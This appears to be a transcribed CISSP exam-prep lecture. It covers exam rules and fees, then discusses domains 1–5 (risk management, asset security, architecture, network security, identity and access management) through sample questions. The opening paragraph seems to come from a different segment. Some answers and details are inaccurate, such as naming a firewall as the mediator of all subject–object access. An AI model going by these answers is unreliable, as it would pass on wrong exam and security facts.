Incineration, crushing, and shredding are few of the methods used for destruction. Now let's move on to our fifth domain, data loss prevention. In this domain, various security measures are adopted that will help in making data available to only the authorized users. Here, we will look into 4 of such measures. The first measure is data inventory. In this step, data is identified and then classified. In the second step, the data flow is plotted over the life cycle. The third measure is data protection strategy. Here, a number of risk assessments are performed. The fourth measure is implementation. In this step, we take up cases which have had a history of data loss for testing purpose. Those were the 5 domains under asset security. In addition to these, it is also required that we understand the term privacy with respect to asset security. Privacy is a very crucial aspect when it comes to asset security. Information privacy and data privacy are more or less the same. This term is used to differentiate one person from another. It relates to the personal data stored on computers. So what kind of data falls under this category? Well, we have data such as medical records, office data, financial data, etc. which fall under this category. To uphold privacy, we use technologies like pseudonymization, tokenization, and anonymization. Well, pseudonymization refers to a data management process. Anonymization refers to a process of either encrypting or removing personally identifiable data so that people who the data describes remain anonymous. And finally, in tokenization, a sensitive piece of data is substituted with a non-sensitive equivalent.
CISSP stands for the Certified Information Security, or rather Certified Information System Security Professional. It is considered as a gold standard in the field of information security. It is a management certification. So when you're in the senior management, this is the kind of certifications that you would require for your management skills. Now, this is a non-technical or a semi-technical certification. Here, it's nothing about vulnerability assessment or penetration testing. You're not going to do anything hands-on. You are not expected to know hacking, or you're not expected to know how to configure firewalls, antiviruses, and whatnot. It's basically something that over a period of years of experience, you have evolved a certain understanding of how security policies should be constructed, how they should be implemented, and how security affects an organization. So here you are responsible to create an overall security policy for an organization to help maintain the security posture of an organization. Now, as far as the certification is concerned, it has a validity of 3 years, after which you don't have to give the exam again. However, during these 3 years, you have to earn a certain point. So it is known as a continuing education points that ISC Square allows you to generate points by attending lectures or by attending webinars, by publishing white papers, by providing trainings. Obviously, all of these should be authorized, and you should have a validation from an authorized party that you have done this activity. Once it is verified, you will be awarded certain points. Once you have collected sufficient number of points, you will retain your certification beyond the 3 years. The passing rate of this exam is less than 50%. So it's not how much you require to score. What this basically tells you is the amount of people who actually clear the exam in the first attempt. Now, let's not get disheartened because of this. Essentially, the exam is quite tough. It's known as a mile wide and inch deep exam. That means you need to know just about everything and anything that is there to be known in information security. And that's something that we are going to discuss when we go into the 8 domains of CISSP. What happens is there are a lot of people who are not actually prepared for the exam, who think they are prepared, attempt the exam, and sadly fail in their first attempts. Some people just misjudge the exam and not prepared for it. So the fact that I'm trying to put across is be very well prepared. I've seen people who study for months together, attempt a lot of questions, ensure that their knowledge is up to the mark, and only then do they attempt the exam. Anybody can register for the exam, to be honest, and clear the exam as well. However, to get certified, there are 2 different avenues. So if you have experience of at least 5 years in 2 of the domains that are in the CISSP course, you get certified. So even if you clear the exam, there is a validation process that happens after the exam where you have to submit documentation to prove to ISC Square that you have that level of experience. And once it is proven and validated, you get certified as a CISSP. If you do not have that 5 years of experience, you get certified as an associate of ISC Square for CISSP, and they give you 6 years during which you can achieve the level of experience, prove it to them, and then get certified as a CISSP. So you can see the stringent levels that are taken for this certification. The validation is basically documentation and proof that you have to submit and which is verified. So even after you clear an exam, to get validated and get certified, it can take up to 5 to 6 weeks for ISC Square to validate and provide you with the certification. With that, let's go and see the exam. Let's have an overview of what the exam is all about. The governing body is ISC Square. That's what we have been referring to. and the professional experience, at least 4 years of college degree or additional credentials from ISC Square's approved list that will satisfy 1 year of required experience, and 5 years of paid full-time work experience in 2 or more domains. Like I said, anybody can give the exam, register for it, attempt it. Once you clear, then that's where the criteria of your work experience comes into the picture. You prove 5 years of experience, probably by a letter from your organization, from your HR saying you have this kind of experience that is relevant to the certification. They will, ISC Square will validate it, you get the certification. If you don't have that experience, you get associate of ISC Square, and then you get 6 years to attain that level of experience, after which you can get certified. The exam fees, $699, so it's an expensive exam. A single attempt for each voucher. So if you fail, that's another $700 for the second attempt. The fact being, if you fail for the first time, you cannot attempt the exam for the next 30 days. If you fail for the second time, you cannot attempt the exam again for the next 60 days. And if you fail for the third time, you cannot attempt the exam for another 90 days. So there's a cooling off period after each attempt. So I would suggest study hard, go for the first attempt, clear it, and nail it. The maintenance fees for your certification is again $85 for 3 years. The exam length is 3 hours, and the questions could vary from 100 to 150. 150 being the max questions that can be asked in that exam. You can clear the exam well before 150 questions, so be prepared for that as well. But imagine when you're walking into that exam, bear in mind that you will be asked 150 questions and you have to time those in 3 hours. 180 minutes, that's what 3 hours is. So if you do the math, not much time for every question. So it's just a minute and a half or less than that for each question. And the questions could be very descriptive, could be confusing. So you have to have your mental faculties really strong during the exam. The passing score is 700 out of a possible 1000 points. Exam language is English. Testing centers, there are ISC Square authorized centers where you need to book that exam. There's a huge process that you have to follow too, where you go for the exam itself. So once you have registered on the ISC Square portal and you purchase the voucher, they will give you a list of centers in your vicinity that you can look into. They'll give you a calendar to give you the possible dates that you can attempt the exam on. Select the center, select the date. Reach the center at least half an hour before the scheduled time. There is a verification, so you have to carry your identification, a government issued document, either a passport, driver's license, where you have to prove that you are who you say you are. And once the verification is done, only then do you get to attempt the exam. The question formats are 3 types: multiple choice, drag and drop, and hotspots. Multiple choice is the format that we are going to look at when we look at sample questions. It's the same. They give you a question, they give you 4 options. Either one or more options need to be chosen. They will specify if there is more than one answer to that particular question. In a drag and drop, it's more like match the following. So there will be a column A and column B, and they'll ask you a question and say, okay, column A gives you the options, drag and drop whichever correct answer is from column A to column B, and then submit the answer. If the answer is correct, you get awarded the points, else there is no negative marking. The third is a hotspot. A hotspot question is basically a diagram, let's say, an architectural diagram that will be presented to you, and they will ask you to pinpoint a certain aspect within that diagram. For example, they may give you an architectural overview of a network, of how it has been established, and they will ask you for a network-based firewall, which is the most likeliest area that you want the firewall to be placed in. So you don't need to know how to configure the firewall, but from an architectural perspective, you need to know where that firewall needs to be placed for it to be the most effective for the given scenario in the question. These are the domains that are asked. So you can see it basically covers anything and everything that is there in information security. It starts off with security and risk management, which weighs 15% in your questions, in your exam. So if your exam is 115 questions, 15% would be around 22 odd questions. And risk management being one of the most important topics for these kind of certifications. Then asset security, which covers 10% of your questions, so that's around 15 questions. Security architecture and engineering, this is where your infrastructural knowledge, your security architecture, your enterprise architecture, all those come into the picture. There are a lot of theoretical models that you need to study in domain 3. and that covers 13% of your exam. Communications and network security, this is the most technical topic within all these 8 topics. This is where you talk about networks, you talk about TCP/IP, you discuss protocols like TCP, UDP, you discuss different attacks, man-in-the-middle attacks, DOS attacks, and this basically has 14% of weightage. Then you have identity and access management, which basically talks about users, subjects, objects, subject being the user, object being the resource, and a relationship between these to be created where people are authorized for some activity, authenticated, and only then allowed, and also held accountable for whatever activity they have done. Then you go into security assessment and testing, so vulnerability assessments, penetration test, software testing, SAS, TAST a little bit. All those will be covered in domain number 6, which has 12% weightage. Then security operations, so security operations center or the SOC, day-to-day management of incidents. So your incident management would come into the picture, problem management, change management, all of those things would come under domain 7 as security operations, which has 13% of weightage. And then finally, software development security. Now, you don't need to know development or you don't need to know any programming. There are no program-based questions. They're not going to ask you how to code. They're going to ask you how to manage a software development lifecycle or a secure software development lifecycle. So this is where your waterfall models, modified waterfall models, Spiral, Agile, DevOps, DevSecOps all come into the picture. And this has 10% of weightage. Now it is near about impossible for everyone or anyone to get experience across all these domains. So you will have your strong points and you will have your weak points. The task is to identify where you're good at, understand those things, make the maximum out of it, then identify your weak points and start developing on those. If you are able to look at it from a theoretical perspective, however, if you can get an internship or if you can get you can say just an insight of how it works in the practical world, it would be very helpful. Now, that being said, as far as CISSP exam is concerned, it involves a very ideal world. The real world actually doesn't come into the question because the real world will have a lot of business logic to it. By business logic, what do we mean? Every organization will modify their projects based on the expertise that they have, based on the talent that they have, and based on the people or the hierarchy of the organization that has been established. So it can be customized to each and every organization. Since an exam cannot deal with these kind of customizations, we deal with an ideal world. So for the CISSP exam, we assume that we have all the resources, we have all the people that are required, we have a hierarchy in the training which is given out where we have rules for each and every person and job titles for each and every person, right? So when we go through the training, it is very essential that we understand what these job roles are, what their responsibilities are, so that when we get those questions, we can identify which person is going to attempt what. In the real world, things are very different. We piggyback, we take on multiple responsibilities, and that is something that CISSP doesn't adhere to. So you have to be very careful. Identify the job roles, identify the responsibilities, have that map, the hierarchical map created very well, and then try to implement the ideal world scenario from the CISSP standards to see what is going to happen. That being said, let's move on. Let's discuss the domains. Now, these domains we've already seen. What we can do is we are going to move on to the sample questions for each and every domain. Once we reach the domain, we'll see what the topics in that domain are. We'll look at the sample questions. Then we will go to the next domain, see the topics in that domain, and then look at the sample questions as well. So, what to study and those sample questions revolving them. So, looking at the first module or first domain, security and risk management. Now, this is one of the largest domains that could be debatable for me. I would say the largest domain could be domain number 3, security architecture and engineering. Could also be domain number 4 because it is quite technical, communications and network security. And could also be security operations because that's incident management, change management, problem management all together. But each domain is very important from the exam's perspective. If you're thinking about keeping a domain for options, forget it. That's not the right way to address the exam. Let's start off with the first one, security and risk management. This domain teaches you all about information systems management, and this talks about risks and everything. So what we are going to do is we are just going to go to the official document from ISC Square where these domains and their topics are given. So that's the exam outline from ISC Square towards CISSP. This is the latest document that is there available online. You can see the URL in my browser address bar. And these are the 8 domains. This is the exam, 3 hours, number of questions 100 to 150, multiple choice and advanced innovative questions. That's where the drag and drop and the hotspot comes into the picture. Though based on experience, I can tell you that 90% of your questions will be multiple choice. 10% would either be drag and drop and hotspots. Passing grade is 700 out of 1000 points. Exam language availability is English. Those who want to attempt in other languages, it is available, but then the exam is 6 hours and the questions are 250. So that's your option depending on which language you're most comfortable with. We are going to go with English. That's the language options coming in. CISSP linear exam, 6 hours, 250 questions. Everything else remains the same. These are the languages supported: French, German, Brazilian, Portuguese, Spanish, Japanese, simplified Chinese, and Korean. The weightage, I guess, remains the same. And that's the first domain, security and risk management. So what does it pertain to? Understand and apply concepts of CIA, confidentiality, integrity, and availability. In the first video, we have gone through all the 8 domains at quite some length. We have discussed what CIA is all about and how the interrelationship is. So if you want a deep dive, or rather a deeper dive than what we are doing for the domains, go back to the first video, look into that, and then you can come back to this video again. So evaluate and apply security governance principles. So we have to understand what governance is. Now, governance is basically having a overlying architectural security policy that can be integrated with an enterprise architecture, and thus having your security policy in alignment with the business goals and objectives. Security should never become a hindrance for a business. Security should always become a supporting feature which should allow the business to be executed in a secure manner. So as a security expert, our first goal is to identify what the business does, what the business processes are, what is the business trying to achieve, and then we try to create a security policy revolving these to enhance the business functionality in a overall picture. So you're looking at organizational processes, acquisitions, divestitures. Acquisition is when, let's say, scenarios where you are trying to create a security governance policy. Now the business is trying to change because they're trying to acquire another organization and merge it within this organization, and now your security policy should encompass not only your organization but the newly acquired organization. Let's say in the next 5 years a business decides that the newly acquired organization is no longer profitable and they want to sell it off, and now that's where the divestiture comes into the picture. You are now trying to separate the entity that you have just integrated in your security policy, and you're now trying to separate it with confidentiality, integrity, and availability of the company's data intact without affecting the organization at any point in time. Understand the fact that security is not only about hacking or getting hacked, it's about being secure at all points in time during business continuity and business, let's say, business as usual kind of activities. So that's where your security control frameworks would come in. You're going to talk about ISO 27001. We're going to talk about COBIT, PCI DSS, NIST 800 series, and so on and so forth. And the most two important statements or terms in the CISSP is due care and due diligence. Due care is you doing your own research to identify what security controls need to be implemented or what kind of governance needs to be implemented, and due diligence is you yourself spending that much time, money, effort into implementing those decisions that you have come across during the due care, thus enhancing the security functions of an organization. So when we talk about business requirements, for a business to be effective, at the same time it needs to be legal, it needs to be compliant to regulations and laws and to the contracts that have been created by the organization. So as far as the concept goes, when we say that security needs to be in alignment with the business requirements, the business requirements imply that the business is legal, is compliant to regulations, is compliant to their contractual obligations, and is following standards that have been prescribed to them. So all of them come together, and that's where your security mapping comes into the picture. You're looking at legal and regulatory issues like cyber crimes and data breaches, licensing and intellectual property requirements, and so on and so forth. And it will also include ISC Square's Code of Professional Ethics. Now, this is a document apart from the 8 domains that we have talked about. Thus, what does this document talk about? This is the prescription from ISC Square of professional ethics for a cybersecurity professional. Expect around 4 to 5 questions from professional ethics as well. So not only is this a document that you need to read and adhere to, you will be questioned upon this in your exam, and these are easy points to score. professional ethics, something that is ethical, something that is not against the law. So it's kind of quite easy, but the questions can be confusing, so you need to go through the entire document really well. And then your organization will have its own code of ethics. However, if you look at the hierarchy, ISC Square's ethics comes first. So your organizational ethics should not be contradictory to ISC Square's ethics in the first place. Then develop, document and implement security policies, standards, procedures and guidelines, identify, analyze and prioritize business continuity requirements. So here that's where your risk assessment comes into the picture. If you're looking at a particular risk, that means a particular vulnerability has been identified, you want to see the likelihood of that vulnerability being exploited, and then the business impact analysis that it may have, based on which you would then create a plan to mitigate that particular risk by having a business continuity or a disaster recovery plan coming into the picture. Now, this is, as far as this domain is concerned, you're calculating the risk. It doesn't actually tell you how to mitigate that risk. That's when you go into the next future domains and discuss those technicalities. So, you can see contribute and enforce personnel security policies. Now, the thing about CISSP is physical security also comes into the picture. Why? Because if hardware is not well protected, there would be physical attacks, social engineering attacks that could be created, which would lead to data leakage as well. And the first and the foremost, most valuable asset of an organization is always human personnel. So CISSP would also deal with people protection in the first place. For example, protecting people against social engineering attacks, making them aware about these attacks. If there are natural calamities, you have to plan for them during your disaster recovery and business continuity plan, and ensure that people are safeguarded. Not only that, you have to tie these things up with identity and access management. For example, account creation, account management, onboarding of employees, offboarding, termination of employees, third-party contractors, consultants that you're going to hire which are not employees but third parties coming in to your organization, providing intelligence, and so on and so forth. So all of those come into the picture as well. And then that's where your risk management concepts come in. It gives you a very good overview of how to identify those risks and so on and so forth. Now, this is what the first domain is all about. It itself is very huge. And as we go ahead, we can tie this domain to the rest of the domains. For more deeper analysis, go to the first video and then we can come back to this. So let's start with the questions. The first question, now these are very short one-liner questions. Your exams would be more descriptive. To be very honest with you, if you go online, no matter what practice questions that you try or whatever dumps, if you can find those, you will find none of them will be ever any close to the actual exam questions. You will find a lot of sites online that sell you CISSP dumps with 100% guarantee for you to clear. Don't fall for that. It's just a money-making scam. Those questions will be similar questions, something that will give you an insight of what the exam is going to be. But when you attempt the exam, you will find out that those questions are way different from the actual exam itself. Coming back to the questions, the primary goal of security awareness program is, now what is a security awareness program and why is it created? The primary goal. So is it to provide a platform for disclosing exposure and risk analysis, to make everyone aware of potential risk and exposure, to provide accurate risk and exposure results, a way of communicating security procedures? Now the answer to this is to make everyone aware of potential risk and exposure. Doesn't mean that you're trying to make everybody an ethical hacker. What you're trying to do is, in your organization, you are trying to create a security awareness program which allows your employees to know what kind of policies exist in your company, what rules need to be followed, what are the procedures that need to be followed for them to safeguard themselves and company assets as well, and ensure that data leakage and data loss are kept at a minimum. So you're basically trying to make everyone aware of the risks that they may have. For example, social engineering, not clicking on links, not going to unwanted sites, and so on and so forth. Question 2, a contingency plan should address which of the following? Potential risks, residual risks, or identified risks. Now, what is a potential risk? A potential risk is something that you may foresee in the future, something that may exist. A residual risk, we'll come to that. What is an identified risk? A risk that has been identified, is known to the organization, and the organization is aware of it. So potential is something that may come into the future. Identified is something that exists right now. A residual risk, on the other hand, is a risk that was identified earlier on, mitigated, but after mitigation, there is still an amount of residual risk that exists. So these terminologies need to be understood really well. Let me give you an example of a residual risk. So let's say there's a SQL injection flaw that has been identified in an application, and that's now an identified risk.
Now you've got two options in front of you: go through a software development lifecycle again, recode that part of the application to mitigate the risk, or else have a security control like a firewall, a web application firewall watching that risk. Now the ideal scenario would be that you go through the development process again, but that is going to take time. So you put in a compensatory control, that is a web application firewall in the meanwhile to mitigate that risk, and then have the recoding done, and then later on resolve the risk altogether. So when we put in the firewall to mitigate the risk temporarily, is the risk actually addressed? No, there is still a possibility of a SQL injection attack happening, but we just have it mitigated to a certain extent because there is a firewall watching it. So that means that there is still a residual risk, a risk that is remaining even after me implementing the security protocol or the security control. That is what a residual risk is. Something that remains even after I put in a security control, which can be taken care of later on or can be accepted and just moved upon. So coming back to the question, a contingency plan should address which of the following? Either a potential risk, a residual risk, an identified risk, or all of the above. And the correct answer to that is a residual risk. What is a contingency plan? A contingency plan is I still have a security control, but something may go wrong. And for that, I want a secondary control to be in place to ensure if the first control fails, the second control would still be able to identify that and stop the security incident happening. So we are looking at residual risks and then having a contingency plan to manage those residual risks. Question 3. When the cost of the countermeasures outweigh the cost of the risk, the best way to handle the risk is to reject the risk, transfer the risk, accept the risk, or reduce the risk. Now, there are 4 ways a risk can be managed, right? Accept the risk, avoid the risk, transfer the risk, or mitigate the risk, right? Rejecting the risk is not an option. But what is the question? Cost of a countermeasure outweighs the cost of the risk. So what is the cost of a risk? The cost of a risk is basically the impact that the organization is going to face in a monetary manner if the risk is realized. To mitigate that, we have a countermeasure in place. So if in the previous example, I have identified a SQL injection attack, and the countermeasure to that is me implementing a security control, a web application firewall to mitigate that risk. However, if somebody executes that risk, somebody does a SQL injection attack, the loss that I'm facing is only $100 per incident. And the maximum incidents that can happen in a year are 10. So 10 into 100 is $1,000 per annum is what that risk is going to cost me. For me to implement a web application firewall, on an annual level, it is going to cost me, let's say, $15,000 in licenses, management, salaries, and all of those things. Which means that I'm facing a loss of $1,000, but I'm spending $15,000 to prevent that loss. I'd rather have the $1,000 loss than spend $15,000, right? So, in this scenario, the cost of the countermeasure is outweighing the cost of the risk by $14,000. So, in this scenario, which is the best way I would do it? Either reject the risk, which is never an option because you cannot reject the risk. Transfer the risk. What is transferring a risk? Transferring it to a third party by purchasing insurance, example, right? So if I purchase insurance saying if this gets compromised, it's the insurance company is going to make the payments. I'm safeguarded. Or accept the risk or reduce the risk. So in this scenario, accepting the risk is basically accepting the risk the way it is, moving on because there is nothing that you can do about the risk and you're willing to accept the risk rather than spend money on it. And reduce the risk is mitigating the risk by implementing the firewall and spending that money and then incurring those losses. So the best answer out of this is accepting the risk. Why can't I transfer the risk? Because there is no such insurance where I can, in the given example, where I can get that kind of an insurance policy. Reducing the risk would entail me spending that $15,000 to mitigate the $1,000 risk, thus incurring a $14,000 loss, which is against the business logic. A business needs to make money, not spend money. And that's the fourth option that's left, that's accepting the risk, which means we are not going to implement the firewall because it is outweighing the cost of the risk. We are just willing to accept the risk itself and move on. That's the first domain. Moving on to the second, which is asset security, consists of topics about physical requirements of information security. Let's go back to the document in hand. So, moving on to domain 2, asset security. We talk about assets. Assets could be, now, okay, let's get into the definition of what an asset is. Asset could be anything that has a monetary value associated with it from the organization's perspective. It could be data, it could be virtual assets, it could be physical assets, it could be anything and everything. It could be a license, right? You purchase an operating system. The operating system comes with a virtual license that installs on your machine or is associated with an email address.
even that license has a value, thus even that license will become an asset. So the basic definition is anything and everything that is owned by the organization and has a monetary value associated with it, right? Thus you're going to talk about asset classification as well. Asset classification could be data. Within data itself, there would be sub-classifications like confidential data, non-confidential data, public data, and so on and so forth. Physical assets, virtual assets, networking assets, anything and everything that you can come across would be classified here. Determine and maintain information and asset ownership. So your asset management program comes into the picture. And when you say asset ownership, the organization owns the assets as they are. However, roles and responsibilities that you have created in the organization will ensure that some assets are virtually owned by somebody. That means that they are responsible for the well-being of that asset. So you have to identify who, for example, HR. Now, HR is a function, human resources, but they also need IT assets. For example, a payroll, which will institute a payroll software, a database, right? A web application server, if you will. And all of these assets are now owned by the HR department. So there are hundreds of people in HR. So who exactly owns this? That's where we identify the owner of that particular asset, saying you are responsible for the well-being of these assets. You belong to this department. So normally the head of that department would be the owner of those assets and would determine what kind of access controls, what kind of maintenance, management, security mechanisms are required. Then we talk about protection privacy. So data owners, data processors, remnants, collection limitations, determining, ensuring appropriate asset retention. So let's say data, right? Even if I have data, how long do I retain data? If you go into privacy acts of organizations or of countries rather, so GDPR for European Union, GDPR basically states that you will only retain personal identifiable information for as long as the organization requires it. The moment you have no reason to have that data with you, you're going to delete that data. So which means automatically says you're going to retain that data till it makes business sense. Once you figure out it is not required, you're going to delete it in a secure manner, which is not recoverable to unwanted parties. So you have to determine those asset retention periods. We have to understand what those retention periods are. So even for your physical assets, there will be life of the asset that is associated with it. And once the life of that asset is over, even if the asset is working properly, you have to discard that asset and you have to replace it. You have to do this with security in mind. Then the security controls for all of these things. Understanding data states. Data states could be in three different aspects: data in motion, data at rest, and data in use. How are you going to secure data during all these three stages? What are the protection methods that you're going to utilize? Then establishing information and asset handling requirements. So that's what domain 2 is all about. Let's look at the questions. So the first question in domain 2, which of the following is responsible for setting user clearances to computer-based information? Is it operators, data owners, security administrators, or data custodians? Understand the question. Who is responsible for setting your user clearances to computer-based information? And the correct answer to that is security administrators. They are responsible for setting the user clearances. Who are going to be responsible for allowing the user clearances? That's going to be data owners. What is generally concerned with personal security? Management controls, operational controls, technical controls, or human resource controls. Now, what is personal security? Personal security is people-centric security. You're looking at people and you're ensuring that their security comes into the picture. Technical controls can be used for data assets or physical assets like information technology, but technical controls may not be that relevant for a human. A firewall is not going to help any human any which ways. Management controls are administrative controls. That means a policy that will help you implement controls. But for personal security, it's the operational controls that are going to be associated with it. Which of the following factors determines the frequency of information security audits in any given environment? So, the age-old question, for you to remain secure, how often do you want to conduct a security audit to verify your vulnerabilities, your penetration tests, to verify your security controls are working properly? So would it be dependent upon asset value, the risk-based approach, management discretion, or level of realized threats? And here, the answer to that question is risk. The moment a risk is identified, for example, at what various stages would a security audit be triggered for an individual asset as well? And that can be tied down to incident management, change management, and problem management. So if there is an incident, a security incident with a database server where there has been an attack on that server, I probably want a security audit done on that server to identify vulnerabilities, flaws, and then to mitigate those risks. Similarly, if there is a change that has been going on into your organization, You first want to go into a risk assessment strategy, and then you want to look at security audits based on the risks that you have identified, right? So a security audit is not only periodic, based on compliances or regulations, but it also can be integrated really well in your incident management, problem management, and change management scenarios. That's domain number 2. All right, let's talk about domain 3, security architecture and engineering. Now, this is where you tie up security architecture and enterprise architecture. If you look at the first domain, we have talked about risk assessments, we have talked about confidentiality, integrity, and availability, and then we have moved on to the second domain where we talked about asset security. So that's where we talked about data classification, asset classification. Now, it starts off with the enterprise level architecture. So something like TOGAF. What is enterprise level architecture? It's basically data center architect and a network architect trying to create data flows, deciding how communications are going to happen between various devices. They're going to try to do network segmentation for web application servers, database servers, look at network isolations, network access control lists, and may even decide how firewalls and where firewalls would be required. Once that architecture is created, we need to secure that architecture to ensure that whatever data communications are happening within that framework, they are secured in a manner where all the risks that the organization may be exposed to are either managed, mitigated, accepted, transferred, whichever the way it is, right? So here you start off with physical security, you start up with trusted platform modules. So looking at the outline, this is where it starts off with implement and manage engineering processes using secure design principles. So this domain will talk about using TOGAF and then using a Zachman framework to interact with all the data owners, all the asset owners, querying them about the security of the assets, the requirements, because it is not the security architect who determines how secure the device will be. It is the asset owner who determines the requirement of security. For example, continuing with the HR example that we were talking about earlier, if the HR department of head is responsible for the database, for the payroll application, it is that person who would be determining the security levels. So based on the security architecture, let's say a Zachman framework, we would create a questionnaire that needs to be filled out by the asset owner, the HR department of head, and would be supplied to us, the security heads, and then we would try to create a security profile based on their requirements. So if the HR department head comes back to me and says that they require to be adhering to a particular standard or they want X kind of security, it is us who will validate that requirement and it is us who will execute it and protect that asset based on their requirements. So this is where your security architecture meets enterprise architecture by using various frameworks. This domain will introduce you to not only Zachman framework, it will again take you to a trusted platform module. It will talk about ITSec, TCSec, common criteria, and so on and so forth. So this is again a very extensive module. Some people struggle with it because it is largely a theoretical module, and some people would struggle with the concept of what is a security architecture and an enterprise architecture. It is very important to understand the differences between them. For example, TOGAF is an enterprise architecture where a data center architect would deploy and streamline those devices on which a layer of security architecture such as ISO 27001 would be implemented to enhance the security and ensure that the infrastructure remains protected at all point in time. This module will also deal with managing vulnerabilities on assets, applications, web-based systems, mobile systems, and embedded devices. So this is where your engineering comes into the picture. By this module, we mean when we are deploying infrastructure, we need to engineer it with security in mind. We need to architect in such a way that security enhances the business needs, business requirements, and they are executed in a secure manner. Let's look at a few questions based on domain 3. Question 1. When a computer uses more than one CPU in parallel to execute instructions, it is known as multiprocessing, multitasking, multithreading, or parallel running. Now, here we need to understand what is the difference between multitasking, multithreading, multiprocessing, and parallel running. Now, it would be very difficult to explain all these processes in this video. So, here we are talking about executing instructions. That's multiprocessing. Multitasking is performing multiple tasks at the same time. Multithreading is where processes create their multiple threads to manage certain functions. Here, when we are parallelly executing instructions, it is known as multiprocessing. Question 2. who mediates all access relationships between subjects and objects of a system. Now, what is a subject, what is an object, and what are access relationships? So access relationships would be your permissions that you have created. Now, what are permissions? Permissions would be something that a person is authorized to do. So if you look at the CIA, which we discussed in the module 1, confidentiality, integrity, and availability, how do we keep data confidential? By only allowing authorized users access to that data. What are authorized users? Authorized users are people who have been identified and are allowed access to certain resources. How do we do that? By having an identity and access management platform in place, which will be discussed later in the next domain. But confidentiality would include IAAA standards. IAAA starts with identification, authentication, authorization, and accountability. Identification is identifying the person, who they are. Authentication is verifying that they are actually who they claim to be. Authorization is where the access relationships come into the picture, where once we have authenticated a user, we are creating a matrix which allows them access to certain resources to a certain extent. Some may have read-only access, some may have modify access, some may have delete access, etc. So in this scenario, we are talking about access relationships between subjects and objects of a system and who mediates that. Now, when you say reference kernel, information flow model, or security kernel, or firewall, in this particular scenario, for this particular question, based on the options that are available, we are talking about a rule-based access control system, which means that we have created rules of what is allowed into a network and what is not allowed within a network. This can be controlled by using a firewall. So this can be controlled by using a firewall. Question 3. Which of the following is not a spam blocking architecture? Now, what is spam and how you're going to block it? It can be at the client side, it can be on the email server where we have identified spam filters, could be application based. In this scenario, mail blocking service is basically you creating a blacklist which will block emails from certain addresses or from certain things. So this is not a spam blocking architecture. It's basically a blacklist where you're blocking emails. But spam blocking architecture could either be at the email server based, could be at the client side where they're using, let's say, Microsoft Outlook Express and they've created rules within it, or could be on an application where you have configured rules over there. Moving on to domain 4. Now, this is where the technicalities come into the picture: communication and network security. The network security domain covers topics focused on protecting the network of an organization. So communications, TCP channels, UDP channels, the TCP IP. So you come across the OSI layer, you map the OSI layer with the TCP IP layer, and see how a data fragment packet is created. Looking at domain 4, we are talking about the OSI layer, open systems interconnection, compared to the TCP IP or the transmission control protocol over internet protocol models. We're talking about internet protocol itself. We are talking about converged protocol, software defined networks, wireless networks. Then we are talking about securing network components. So we talk about firewalls, types of firewalls, endpoint security, network access control devices, and we look at them over virtualized networks, VoIP, multimedia, talking about remote access, data communications. Right, so all of this is concerned within domain 4. Now, OSI and TCP itself could take hours for people to understand, to people to comprehend how computers work. Now, these are theoretical models, and we need to create an understanding of how theory merges with the practical world. Let's look at a few questions. What is the purpose of using a VPN? Now, the essence over here is, what is a VPN or a virtual private network? How is it created? What technologies can be utilized within it? What encryption mechanisms can be utilized? And why are we creating that encryption mechanism in the first place? So is it to secure remote access into a network, securely connect two networks together, secure data tunnel within a network, or all of the above? So here with a VPN, we are basically trying to do everything. We are trying to create encrypted tunnel between two systems or two networks where data can be transmitted in a secure manner, where man-in-the-middle attacks or network-based attacks would be mitigated. A VPN can secure packets from data link layer onwards to the application layer. Question 2. Which of the following characteristics are not included in the TCP protocol? Now, what is a TCP protocol? TCP is a connection-oriented protocol. It is a reliable protocol that is utilized to communicate between servers in a reliable manner. So a TCP protocol being a connection-oriented protocol, which is reliable in nature. So which of the following characteristics are not included? Connection-less protocol, that is the UDP protocol. So this is not included in the TCP protocol. Question 3, which, if you remember the previous slide,
would be the UDP protocol. A UDP protocol is a protocol that is used for its speed rather than reliability. When it is real-time processing that is required, we use UDP. So most of our VoIP communications would happen over UDP protocols. Okay, so looking at domain number 5. Domain 5 talks about identity and access management. So this ties up with your asset management, your risk management, because if we go back to the confidentiality, integrity, and availability aspect of it, identity and access management is basically allowing authorized users access to resources by authenticating them and also holding them accountable. So this becomes the essence of how you're going to allow people to access the resources that you have in your organization. Let's look at what this domain covers. It will talk about physical and logical access to assets. So servers need to be protected by putting them in a secure server room, thus restricting access to them and allowing access only to those few people who require access to them. Once we have secured those servers, this is where we talk about physical security, whereas we got a secure room, we are going to monitor that room, we will have access controls, we will have guards monitoring who is getting access or who's trying to get access to that environment. And then you're going to create logical access as well, where we, let's say, have swipe cards on the door locks. So anyone with logical swipe card can access that particular facility. You're also looking at managing identification and authentication of people, devices, and services. So here we are going to talk about authentication mechanisms, single authentication, multi-factor authentication. We are talking about single sign-ons. We will talk about federated identity management modules. We'll look at CASB, or cloud access service brokers. We will talk about session management from applications and so on and so forth. We will also talk about third-party identity as a service provider, where we integrate those identities like OpenID into our organization and we validate people based on the identity that they have created with those organizations. Then we talk about access control lists, which would be role-based access controls, mandatory access controls, discretionary access controls, attribute-based access controls, rule-based access controls. And then there are a lot of theoretical models that are integrated in this module, which talk about lattice-based approach, which will talk about other theoretical models which will help you align how identity and access management is implemented in an organization. So at this point in time, we will also be looking at a life cycle of how identities are managed. For example, onboarding of people, deboarding of people, termination of employees as they move within the organization by getting promotions, demotions, or changing departments and assuming a new role. So here we talk about how we can provision an identity, how we can deprovision an identity, how it is to be managed. We're going to create a relationship between the creator of this identity and the approver, who's going to be a manager. So even if somebody is allowed to create an identity, they will only create it if they have an approval from an appropriate manager. So let's look at questions from domain number 5. The first one, which of the following is the most important factor while selecting a biometric system for securing critical assets? Now here, the domain talks about the types of authentication mechanisms. There are 5 types, essentially 3 basic types, which talk about something that you know, which is a password, something that you have, a swipe card, someone that you are, a biometric, somewhere that you are, location-based, and something that you do, like CAPTCHA. So these are the 5 basic authentication types or mechanisms that you can utilize in an organization. Multi-factor authentication is having multiple of these options integrated in our identity and access management module to enhance the security. Now coming back to biometrics have positives and negatives amongst them. So with the biometric, there are 2 types that we talk about: false acceptance rate and false rejection rate. What is a false acceptance rate? Somebody, let's say you're using a thumbprint to authenticate people. Somebody put down their thumbprint. The person is not actually authorized. However, it was read incorrectly and the door got unlocked and the person got access to that particular area, which is a false acceptance rate. A false rejection rate is an authenticated or an authorized person actually trying their thumbprint, but it not getting recognized. Thus, they did not get access to the area or to the device that they wanted. Now, the question here is, which of the following is the most important factor while selecting a biometric system for securing critical assets? Now, would I want to focus on false rejection rate or false acceptance rate? Then we also have equal error rate and maximum allowable downtime.
